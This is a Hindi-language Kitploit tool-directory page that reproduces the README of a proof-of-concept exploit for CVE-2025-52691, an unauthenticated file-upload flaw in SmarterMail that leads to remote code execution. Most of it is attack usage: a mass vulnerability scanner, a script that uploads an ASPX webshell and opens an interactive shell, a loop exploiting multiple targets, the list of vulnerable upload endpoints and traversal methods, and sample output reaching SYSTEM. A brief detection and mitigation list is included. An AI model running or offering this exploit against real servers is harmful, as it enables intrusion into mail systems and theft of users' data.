Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52691-poc — CVE-2025-52691 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: SmarterMail में अप्रमाणित मनमाना फ़ाइल अपलोड जिससे RCE होता है। इसमें भेद्यता स्कैनर, ASPX वेबशेल अपलोडर, और अधिकृत सुरक्षा परीक्षण के लिए इंटरैक्टिव शेल शामिल है। | Kitploit
उपकरण/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
भेद्यता स्कैनरपेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
rimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

CVE-2025-52691 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: SmarterMail में अप्रमाणित मनमाना फ़ाइल अपलोड जिससे RCE होता है। इसमें भेद्यता स्कैनर, ASPX वेबशेल अपलोडर, और अधिकृत सुरक्षा परीक्षण के लिए इंटरैक्टिव शेल शामिल है।

रिपॉजिटरी देखें
37 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-52691 POC

प्रूफ़ ऑफ़ कॉन्सेप्ट CVE-2025-52691 के लिए - SmarterMail बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड RCE

⚠️ अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए। अनधिकृत पहुँच अवैध है।

अवलोकन

SmarterMail में एक गंभीर कमजोरी जो पथ ट्रैवर्सल के माध्यम से बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।

कमजोरी: अपलोड एंडपॉइंट्स में पथ ट्रैवर्सल ASPX वेबशेल को वेब रूट में अपलोड करने की अनुमति देता है
प्रभाव: बिना प्रमाणीकरण के रिमोट कोड निष्पादन
वेक्टर: नेटवर्क / बिना प्रमाणीकरण

स्थापना

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

उपकरण

check.py - कमजोरी स्कैनर

लक्ष्यों को CVE-2025-52691 कमजोरी के लिए स्कैन करता है। केवल कमजोर URLs को आउटपुट फ़ाइल में सहेजता है।

root@kitploit:~
# Single target
python check.py https://mail.example.com

# Multiple targets
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30

आउटपुट: results.txt में प्रति पंक्ति एक कमजोर URL

pwn.py - शोषण उपकरण

ASPX वेबशेल अपलोड करता है और कमांड निष्पादन प्रदान करता है।

root@kitploit:~
# Basic exploit
python pwn.py https://mail.example.com

# Execute command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell
python pwn.py https://mail.example.com -i

exploit.py - पायथन लाइब्रेरी

कस्टम स्क्रिप्ट में एकीकरण के लिए पुन: प्रयोज्य शोषण मॉड्यूल।

लाइब्रेरी के रूप में:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

स्टैंडअलोन स्क्रिप्ट के रूप में:

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

तकनीकी विवरण

कमजोर एंडपॉइंट्स:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

शोषण विधियाँ:

  • पथ ट्रैवर्सल के साथ मल्टीपार्ट फ़ॉर्म अपलोड (../wwwroot/)
  • कस्टम हेडर के साथ रॉ POST
  • बेस64-एन्कोडेड सामग्री के साथ JSON पेलोड

वेबशेल: न्यूनतम ASPX शेल जो ?cmd= पैरामीटर के माध्यम से कमांड स्वीकार करता है

हमला प्रवाह

  1. लक्ष्य स्कैन करें: python check.py <target>
  2. शोषण करें: python pwn.py <target> -i
  3. इंटरैक्टिव शेल में कमांड निष्पादित करें

पहचान और शमन

पहचान:

  • वेब निर्देशिकाओं में ASPX फ़ाइल अपलोड की निगरानी करें
  • पथ ट्रैवर्सल पैटर्न (../) के लिए लॉग जांचें
  • अप्रत्याशित /api/upload अनुरोधों पर अलर्ट करें

शमन:

  • SmarterMail को नवीनतम संस्करण में अपडेट करें
  • सख्त फ़ाइल पथ सत्यापन लागू करें
  • अपलोड फ़िल्टरिंग के साथ WAF तैनात करें
  • अपलोड एंडपॉइंट्स पर प्रमाणीकरण की आवश्यकता है

उदाहरण

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

परीक्षण से पहले हमेशा उचित अधिकार प्राप्त करें।

टूल डाउनलोड करें